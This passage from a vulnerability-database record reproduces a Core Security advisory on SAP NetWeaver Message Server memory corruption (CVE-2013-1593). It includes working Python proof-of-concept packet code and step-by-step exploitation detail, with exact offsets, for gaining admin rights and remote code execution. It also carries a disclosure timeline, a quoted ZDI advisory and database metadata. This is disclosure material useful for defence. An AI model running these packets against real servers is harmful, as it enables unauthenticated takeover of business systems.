*Technical Description / Proof of Concept Code*\n\nThe following python script is the main PoC that can be used to\nreproduce all vulnerabilities described below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-d\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3900)\n(options, args) = parser.parse_args()\n\nclient_string = \u0027-\u0027+\u0027 \u0027*39\nserver_name = \u0027-\u0027+\u0027 \u0027*39\n\ndef send_packet(sock, packet):\n    packet = struct.pack(\"!I\", len(packet)) + packet\n    sock.send(packet)\n\ndef receive(sock):\n    length = sock.recv(4)\n    (length, ) = struct.unpack(\"!I\", length)\n    data = \"\"\n    while len(data)\u003clength:\n        data+= sock.recv(length)\n    return (length, data)\n\ndef initialize_connection(hostname, port):\n\n    # Connect\n    print \"[*] Connecting to\", hostname, \"port\", port\n    connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    connection.connect((hostname, port))\n\n    # Send initialization packet\n    print \"[*] Conected, sending login request\"\n\n    init = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    init+= \u0027\\x04\u0027 # version\n    init+= \u0027\\x00\u0027 # errorno\n    init+= client_string # toname\n    init+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    init+= \u0027\\x01\\x08\u0027 # flag / iflag (MS_LOGIN_2)\n    init+= client_string # fromname\n    init+= \u0027\\x00\\x00\u0027 # padd\n    send_packet(connection, init)\n\n    # Receive response\n    print \"[*] Receiving login reply\"\n    (length, data) = receive(connection)\n\n    # Parsing login reply\n    server_name = data[4+64:4+64+40]\n\n    return connection\n\n# Main PoC body\nconnection = 
initialize_connection(options.hostname, options.port)\nsend_attack(connection)\n\n-----/\n\n\nIn the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. Malicious\npackets are processed by the vulnerable function \u0027_MsJ2EE_AddStatistics\u0027\nin the \u0027msg_server.exe\u0027 module. \n\nThe vulnerable function \u0027_MsJ2EE_AddStatistics\u0027 receives a pointer to a\n\u0027MSJ2EE_HEADER\u0027 struct as its third parameter, which is fully controlled\nby the attacker. This struct type is defined as follows:\n\n/-----\n00000000 MSJ2EE_HEADER   struct ; (sizeof=0x28, standard type)\n00000000 senderclusterid dd ?\n00000004 clusterid       dd ?\n00000008 serviceid       dd ?\n0000000C groupid         dd ?\n00000010 nodetype        db ?\n00000011                 db ? ; undefined\n00000012                 db ? ; undefined\n00000013                 db ? ; undefined\n00000014 totallength     dd ?\n00000018 currentlength   dd ?\n0000001C currentoffset   dd ?\n00000020 totalblocks     db ?\n00000021 currentblock    db ?\n00000021\n00000022                 db ? ; undefined\n00000023                 db ? ; undefined\n00000024 messagetype     dd ?\n00000028 MSJ2EE_HEADER   ends\n-----/\n The \u0027_MsJ2EE_AddStatistics\u0027 function uses the \u0027serviceid\u0027 field of the\n\u0027MSJ2EE_HEADER\u0027 to calculate an index to write into the\n\u0027j2ee_stat_services\u0027 global array, without properly validating that the\nindex is within the boundaries of the array. On the other hand,\n\u0027j2ee_stat_services\u0027 is a global array of 256 elements of type\n\u0027MSJ2EE_STAT_ELEMENT\u0027:\n\n/-----\n.data:0090B9E0    ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0    j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0    ; DATA XREF: _MsJ2EE_AddStatistics+24o\n.data:0090B9E0    ; _MsJ2EE_AddStatistics+4Co ... 
\n\n-----/\n This vulnerability can be used to corrupt arbitrary memory with\narbitrary values, with some restrictions. The following snippet shows\nthe vulnerable code within the \u0027_MsJ2EE_AddStatistics\u0027 function:\n\n/-----\nmov     edi, [ebp+pJ2eeHeader]\nmov     eax, [edi+MSJ2EE_HEADER.serviceid]              ;attacker\ncontrols MSJ2EE_HEADER.serviceid\nxor     ecx, ecx\ncmp     dword ptr j2ee_stat_total.totalMsgCount+4, ecx\nlea     esi, [eax+eax*8]\nlea     esi, j2ee_stat_services.totalMsgCount[esi*8]    ;using the index\nwithout validating array bounds\n\n-----/\n Since the \u0027serviceid\u0027 value is first multiplied by 9 and then it is\nmultiplied by 8, the granularity of the memory addresses that can be\ntargeted for memory corruption is 0x48 bytes, which is the size of the\n\u0027MSJ2EE_STAT_ELEMENT\u0027 struct:\n\n/-----\n00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)\n00000000                                         ; XREF:\n.data:j2ee_stat_totalr\n00000000                                         ; .data:j2ee_stat_servicesr\n00000000 totalMsgCount   dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+1Br\n00000000                                         ;\n_MsJ2EE_AddStatistics+2Fr ... \n00000008 totalMsgLength  dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+192r\n00000008                                         ;\n_MsJ2EE_AddStatistics+19Br ... \n00000010 avgMsgLength    dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+1C2w\n00000010                                         ;\n_MsJ2EE_AddStatistics+1C7w ... \n00000018 maxLength       dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+161r\n00000018                                         ;\n_MsJ2EE_AddStatistics+16Er ... \n00000020 noP2PMessage    dq ?                    ; XREF:\n_MsJ2EE_AddStatistics:loc_44D442w\n00000020                                         ;\n_MsJ2EE_AddStatistics+158w ... \n00000028 noP2PRequest    dq ?                    
; XREF:\n_MsJ2EE_AddStatistics+144w\n00000028                                         ;\n_MsJ2EE_AddStatistics+14Aw ... \n00000030 noP2PReply      dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+132w\n00000030                                         ;\n_MsJ2EE_AddStatistics+138w ... \n00000038 noBroadcastMessage dq ?                 ; XREF:\n_MsJ2EE_AddStatistics:loc_44D40Dw\n00000038                                         ;\n_MsJ2EE_AddStatistics+123w ... \n00000040 noBroadcastRequest dq ?                 ; XREF:\n_MsJ2EE_AddStatistics+10Fw\n00000040                                         ;\n_MsJ2EE_AddStatistics+115w ... \n00000048 MSJ2EE_STAT_ELEMENT ends\n\n-----/\n However, it is possible to use different combinations of the\n\u0027flag/iflag\u0027 values in the Message Server packet to gain more precision\nover the memory addresses that can be corrupted. Different combinations\nof \u0027flag/iflag\u0027 values provide different memory corruption primitives,\nas shown below:\n\n/-----\nAt this point:\n * ESI points to an arbitrary, attacker-controlled memory address\n * EBX == 1\n\n.text:0044D359                 movzx   eax, [ebp+msiflag]\n.text:0044D35D                 sub     eax, 0Ch\n.text:0044D360                 jz      short loc_44D37C\n.text:0044D362                 sub     eax, ebx\n.text:0044D364                 jnz     short loc_44D39D\n.text:0044D366                 cmp     [ebp+msflag], 2\n.text:0044D36A                 jnz     short loc_44D374\n.text:0044D36C                 add     [esi+40h], ebx  ; iflag=0xd,\nflag=2 =\u003e add 1 to [esi+0x40]\n.text:0044D36F                 adc     [esi+44h], ecx\n.text:0044D372                 jmp     short loc_44D39D\n.text:0044D374 ;\n---------------------------------------------------------------------------\n.text:0044D374\n.text:0044D374 loc_44D374:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+7Aj\n.text:0044D374                 add     [esi+38h], ebx  ; iflag=0xd,\nflag=1 
=\u003e add 1 to [esi+0x38]\n.text:0044D377                 adc     [esi+3Ch], ecx\n.text:0044D37A                 jmp     short loc_44D39D\n.text:0044D37C ;\n---------------------------------------------------------------------------\n.text:0044D37C\n.text:0044D37C loc_44D37C:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+70j\n.text:0044D37C                 mov     al, [ebp+msflag]\n.text:0044D37F                 cmp     al, 3\n.text:0044D381                 jnz     short loc_44D38B\n.text:0044D383                 add     [esi+30h], ebx  ; iflag=0xc,\nflag=3 =\u003e add 1 to [esi+0x30]\n.text:0044D386                 adc     [esi+34h], ecx\n.text:0044D389                 jmp     short loc_44D39D\n.text:0044D38B ;\n---------------------------------------------------------------------------\n.text:0044D38B\n.text:0044D38B loc_44D38B:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+91j\n.text:0044D38B                 cmp     al, 2\n.text:0044D38D                 jnz     short loc_44D397\n.text:0044D38F                 add     [esi+28h], ebx  ; iflag=0xc,\nflag=2 =\u003e add 1 to [esi+0x28]\n.text:0044D392                 adc     [esi+2Ch], ecx\n.text:0044D395                 jmp     short loc_44D39D\n.text:0044D397 ;\n---------------------------------------------------------------------------\n.text:0044D397\n.text:0044D397 loc_44D397:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+9Dj\n.text:0044D397                 add     [esi+20h], ebx  ; iflag=0xc,\nflag=1 =\u003e add 1 to [esi+0x20]\n.text:0044D39A                 adc     [esi+24h], ecx\n\n[...]\n\n-----/\n And the following code excerpt is always executed within the\n\u0027_MsJ2EE_AddStatistics\u0027 function, providing two more memory corruption\nprimitives:\n\n/-----\n.text:0044D3B7                 add     [esi],\nebx                               ;add 1 to [esi]\n.text:0044D3B9                 adc     dword ptr [esi+4], 0\n.text:0044D3BD                 mov 
    eax,\n[edi+MSJ2EE_HEADER.totallength]     ;MSJ2EE_HEADER.totallength is fully\ncontrolled by the attacker\n.text:0044D3C0                 cdq\n.text:0044D3C1                 add     [esi+8],\neax                             ;add an arbitrary number to [esi+8]\n\n-----/\n This memory corruption vulnerability can be used by remote\nunauthenticated attackers to execute arbitrary code on vulnerable\ninstallations of SAP Netweaver, but it can also be abused to modify the\ninternal state of the vulnerable service in order to gain administrative\nprivileges within the SAP Netweaver Message Server. \n\nA client connected to the Message Server may have administrative\nprivileges or not. The Message Server holds a structure of type\n\u0027MSADM_s\u0027 for each connected client, which contains information about\nthat very connection. Relevant parts of the \u0027MSADM_s\u0027 struct type are\nshown below:\n\n/-----\n00000000 MSADM_s         struc ; (sizeof=0x538, standard type)\n00000000                                         ; XREF: .data:dummy_clientr\n00000000 client_type     dd ?                    ; enum MS_CLIENT_TYPE\n00000004 stat            dd ?                    ; enum MS_STAT\n00000008 connection_ID   dd ?\n0000000C status          db ?\n0000000D dom             db ?                    ; XREF: MsSFillCon+3Cw\n0000000E admin_allowed   db ?\n0000000F                 db ? ; undefined\n00000010 name            dw 40 dup(?)\n[...]\n00000534 _padding        db 4 dup(?)\n00000538 MSADM_s         ends\n\n-----/\n The \u0027admin_allowed\u0027 field at offset 0x0E is a boolean value that\nindicates whether the connected client has administrative privileges or\nnot. 
When a new client connects, the \u0027MsSLoginClient\u0027 function of the\nMessage Server sets the proper value for the \u0027admin_allowed\u0027 field in\nthe \u0027MSADM_s\u0027 struct instance associated with that client:\n\n/-----\n.text:004230DC\nloc_4230DC:                                                  ; CODE\nXREF: MsSLoginClient+AAAj\n.text:004230DC\n   ; MsSLoginClient+B26j\n.text:004230DC                 cmp     byte ptr [edi+0Eh],\n0                ; privileged client?\n.text:004230E0                 jnz     short\nloc_4230EA                     ; if yes, jump\n.text:004230E2                 mov     al, byte ptr\nms_admin_allowed        ; otherwise, grab the value of the\n\"ms_admin_allowed\" global variable... \n.text:004230E7                 mov     [edi+0Eh],\nal                        ; ...and save it to MSADM_s.admin_allowed\n\n-----/\n So if we manage to overwrite the value of the \u0027ms_admin_allowed\u0027 global\nvariable with a value different than 0, then we can grant administrative\nprivileges to our unprivileged connections. In SAP Netweaver\n\u0027msg_server.exe\u0027 v7200.70.18.23869, the \u0027ms_admin_allowed\u0027 global\nvariable is located at \u00270x008f17f0\u0027:\n\n/-----\n.data:008F17F0 ; int ms_admin_allowed\n.data:008F17F0 ms_admin_allowed dd ?                   ; DATA XREF:\nMsSSetMonitor+7Ew\n.data:008F17F0                                         ; MsSLoginClient+B62r\n\n-----/\n And the \u0027j2ee_stat_services\u0027 global array, which is the array that can\nbe indexed outside its bounds, is located at \u00270x0090b9e0\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0                                         ; DATA XREF:\n_MsJ2EE_AddStatistics+24o\n.data:0090B9E0                                         ;\n_MsJ2EE_AddStatistics+4Co ... 
\n\n-----/\n So, by providing \u0027MSJ2EE_HEADER.serviceid == 0x038E3315\u0027, we will be\ntargeting \u00270x008F17C8\u0027 as the base address for memory corruption. Having\nin mind the different memory corruption primitives based on combinations\nof \u0027flag/iflag\u0027 fields described above, by specifying \u0027iflag == 0xC\u0027 and\n\u0027flag == 0x2\u0027 in our Message Server packet we will be able to add 1 to\n\u0027[0x008F17C8+0x28]\u0027, effectively overwriting the contents of\n\u00270x008F17F0\u0027 (\u0027ms_admin_allowed\u0027). After overwriting \u0027ms_admin_allowed\u0027,\nall of our future connections will have administrative privileges within\nthe Message Server. \n\nAfter gaining administrative privileges for our future connections,\nthere are at least two possible paths of exploitation:\n\n   1. Of\ncourse it is not mandatory to have administrative privileges in order to\noverwrite function pointers, but considering the limitation of\ntargetable addresses imposed by the little granularity of the memory\ncorruption, some of the most handy-to-exploit function pointers happened\nto be accessible just for administrative connections. \n   2. Modify the configuration and behavior of the server. That includes\nchanging Message Server\u0027s runtime parameters and enabling Monitor Mode\nin the affected server. \n\n8.1.1. *Gaining remote code execution by overwriting function pointers*\n\nHaving in mind that the granularity of the memory addresses that can be\ntargeted for memory corruption is not that flexible (0x48 bytes) and the\nlimited memory corruption primitives available, it takes some effort to\nfind a function pointer that can be overwritten with a useful value and\nwhich can be later triggered with a network packet. 
\n\nOne possibility is to overwrite one of the function pointers which are\nin charge of handling the modification of Message Server parameters:\n\n/-----\n.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]\n\n; function pointers associated to the modification of the \"ms/max_sleep\"\nparameter\n.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER\n\u003coffset aMsMax_sleep, \\\n.data:0087DED0                                              offset\nMsSTestInteger, \\ ; \"rdisp/TRACE_PATTERN_2\"\n.data:0087DED0                                              offset\nMsSSetMaxSleep\u003e\n\n; function pointers associated to the modification of the \"ms/max_vhost\"\nparameter\n.data:0087DED0                 SHMPRF_CHANGEABLE_PARAMETER \u003coffset\naMsMax_vhost, \\\n.data:0087DED0                                              offset\nMsSTestInteger, \\                    ;\u003c-- we can overwrite this one\n.data:0087DED0                                              offset\nMsSSetMaxVirtHost\u003e\n\n[...]\n\n-----/\n By providing \u0027MSJ2EE_HEADER.serviceid == 0x038E1967\u0027 we can target\n\u00270x0087DED8\u0027 as the base address for memory corruption. In this case we\ncan use the memory corruption primitive at address \u00270x0044D3C1\u0027 that\nalways gets executed, which will allow us to add an arbitrary number\n(the value of \u0027MSJ2EE_HEADER.totallength\u0027) to \u0027[0x0087DED8+8]\u0027\neffectively overwriting the function pointer shown above\n(\u0027ms_changeable_parameter[1].set\u0027). \n\nAfter that we need to send a \u0027MS_SET_PROPERTY\u0027 request, specifying\n\u0027ms/max_vhost\u0027 as the name of the property to be changed. 
This\n\u0027MS_SET_PROPERTY\u0027 packet will make our overwritten function pointer to\nbe called from the \u0027MsSChangeParam\u0027 function:\n\n/-----\n.text:00404DB3 loc_404DB3:                             ; CODE XREF:\nMsSChangeParam+CDj\n.text:00404DB3                 lea     esi, [edi+edi*2]\n.text:00404DB6                 mov     edi, [ebp+pvalue]\n.text:00404DB9                 add     esi, esi\n.text:00404DBB                 mov     edx,\nms_changeable_parameter.test[esi+esi]\n.text:00404DC2                 add     esi, esi\n.text:00404DC4                 push    edi\n.text:00404DC5                 push    pname\n.text:00404DC6                 call    edx              ; call our\noverwritten function pointer\n\n-----/\n\u0027MS_SET_PROPERTY\u0027 packets will be ignored by the Message Server if the\nrequesting client does not have administrative privileges, so it is\nnecessary to gain administrative privileges as explained above before\nusing the memory corruption vulnerability to overwrite one of the\nfunction pointers in the \u0027ms_changeable_parameter\u0027 global array. \n\n\n8.1.2. *Modify the configuration and behavior of the server*\n\nAfter gaining administrative privileges for our connections, it is\npossible to perform \u0027MS_SET_PROPERTY\u0027 packets against the Message Server\nin order to modify its configuration and behavior. That makes possible,\nfor example, to add virtual hosts to the load balancer, or to enable\nMonitor Mode [3] (transaction SMMS) on the affected server. Enabling\nMonitor Mode takes two steps:\n\n   1. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/monitor\"\u0027, property \u0027value == 1\u0027. \n   2. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/admin_port\"\u0027, property \u0027value == 3535\u0027 (or any other arbitrary port\nnumber). 
\n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n    print \"[*] Sending crash packet\"\n    crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    crash+= \u0027\\x04\u0027 # version\n    crash+= \u0027\\x00\u0027 # errorno\n    crash+= server_name # toname\n    crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    crash+= \u0027\\x04\\x0d\u0027 # flag/iflag\n    crash+= client_string # fromname\n    crash+= \u0027\\x00\\x00\u0027 # padd\n\n    crash+=\n\"ABCDEFGH\"+\"\\x01\\x00\\x00\\x00\"+\"MNOPQRSTUVWXYZ0123\"+\"\\x01\"+\"56789abcd\"\n    crash+= \"\\x00\\x00\\x00\\x01\"\n    crash+= \"\\xff\\xff\\xff\\xff\"\n    crash+= \"\\x00\\x00\\x00\\x00\"\n    send_packet(connection, crash)\n\n    print \"[*] Crash sent !\"\n-----/\n\n\n\n8.2. \nMalicious packets are processed by the vulnerable function \u0027WRITE_C\u0027 in\nthe \u0027msg_server.exe\u0027 module. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n    print \"[*] Sending crash packet\"\n    crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    crash+= \u0027\\x04\u0027 # version\n    crash+= \u0027\\x00\u0027 # errorno\n    crash+= server_name # toname\n    crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    crash+= \u0027\\x04\\x05\u0027 # flag/iflag\n    crash+= client_string # fromname\n    crash+= \u0027\\x00\\x00\u0027 # padd\n\n    crash+= \"AD-EYECATCH\\x00\"\n    crash+= \"\\x01\\x01\"\n    crash+= \"%11d\" % 104\n    crash+= \"%11d\" % 1\n    crash+= \"\\x15\\x00\\x00\\x00\"\n    crash+= \"\\x20\\x00\\x00\\xc8\"\n    crash+= \"LALA\" + \u0027 \u0027*(20-4)\n    crash+= \"LOLO\" + \u0027 \u0027*(40-4)\n    crash+= \" \"*36\n    send_packet(connection, crash)\n\n    print \"[*] Crash sent !\"\n\n-----/\n\n\n\n9. *Report Timeline*\n. 
2012-12-10:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for January 22nd,\n2013. 2012-12-10:\nCore sends an advisory draft with technical details and a PoC. 2012-12-11:\nThe SAP team confirms the reception of the issue. 2012-12-21:\nSAP notifies that they concluded the analysis of the reported issues and\nconfirms two out of the five vulnerabilities. Vendor also notifies that\nthe other three reported issues were already fixed in February, 2012. \nVendor also notifies that the necessary code changes are being done and\nextensive tests will follow. The corresponding security note and patches\nare planned to be released on the Security Patch Day on Feb 12th 2013. 2012-12-21:\nCore re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28:\nSAP notifies Core that they will be contacted if tests fail in order to\nre-schedule the advisory publication. 2013-01-22:\nFirst release date missed. 2013-01-28:\nSAP notifies that they are still confident about releasing a security\nnote and patches on Feb 12th as planned. 2013-01-29:\nCore acknowledges receiving the information and notifies that everything\nis ready for public disclosure on Feb 12th. Core also asks for additional\ninformation regarding the patched vulnerabilities mentioned in\n[2012-12-21], including links to security bulletins, CVEs, and patches in\norder to verify if those patches effectively fix the reported flaws. 2013-02-01:\nSAP notifies that the patched vulnerabilities mentioned in [2012-12-21]\nwere reported in [5] and no CVEs were assigned to them. Those\nvulnerabilities seem to be related to ZDI advisories [6], [7], [8]. 2013-02-06:\nCore notifies that the patched vulnerabilities will be removed from the\nadvisory and asks for additional information regarding the affected and\npatched version numbers. 
2013-02-01:\nSAP notifies that the security note 1800603 will be released and that\nnote will provide further information regarding this vulnerability. 2013-02-13:\nAdvisory CORE-2012-1128 published. \n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx. \n[2] SAP Security note Feb 2013\nhttps://service.sap.com/sap/support/notes/1800603. \n[3]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. \n\n[4]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. \n\n[5] SAP Security notes Feb 2012\nhttps://service.sap.com/sap/support/notes/1649840. \n[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. \n[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. \n[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. 
\n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code\nExecution Vulnerability\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-104\nJune 27, 2012\n\n- -- CVE ID:\n\n\n- -- CVSS:\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\n\n- -- Affected Vendors:\nSAP\n\n- -- Affected Products:\nSAP NetWeaver\n\n\n- -- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 12407. \n\n\n- -- Vendor Response:\nSAP has issued an update to correct this vulnerability. 
More details can be\nfound at:\nhttp://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1\n0-eea7-ceb666083a6a#section40\n\n\n- -- Disclosure Timeline:\n2011-10-28 - Vulnerability reported to vendor\n2012-06-27 - Coordinated public release of advisory\n\n\n- -- Credit:\nThis vulnerability was discovered by:\n* e6af8de8b1d4b2b6d5ba2610cbf9cd38\n\n\n- -- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n    http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. 
\n\nOur vulnerability disclosure policy is available online at:\n\n    http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n    http://twitter.com/thezdi\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 10.2.0 (Build 1950)\nCharset: utf-8\n\nwsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t\nuAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E\n1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR\nXFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3\nJqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6\nwGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA==\n=t/ct\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-1593"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007128"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "BID",
        "id": "57956"
      },
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1593"
      },
      {
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "db": "PACKETSTORM",
        "id": "114279"
      }
    ],
    "trust": 5.49
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-1593",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "57956",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1028148",
        "trust": 1.7
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104",
        "trust": 0.9
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433",
        "trust": 0.8
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112",
        "trust": 0.8
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007128",
        "trust": 0.8
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-1396",
        "trust": 0.7
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-1394",
        "trust": 0.7
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-1395",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "54229",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "54231",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-368",
        "trust": 0.6
      },
      {
        "db": "IVD",
        "id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "120350",
        "trust": 0.2
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1593",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "114279",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1593"
      },
      {
        "db": "BID",
        "id": "57956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007128"
      },
      {
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "db": "PACKETSTORM",
        "id": "114279"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-368"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1593"
      }
    ]
  },
  "id": "VAR-202001-0833",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
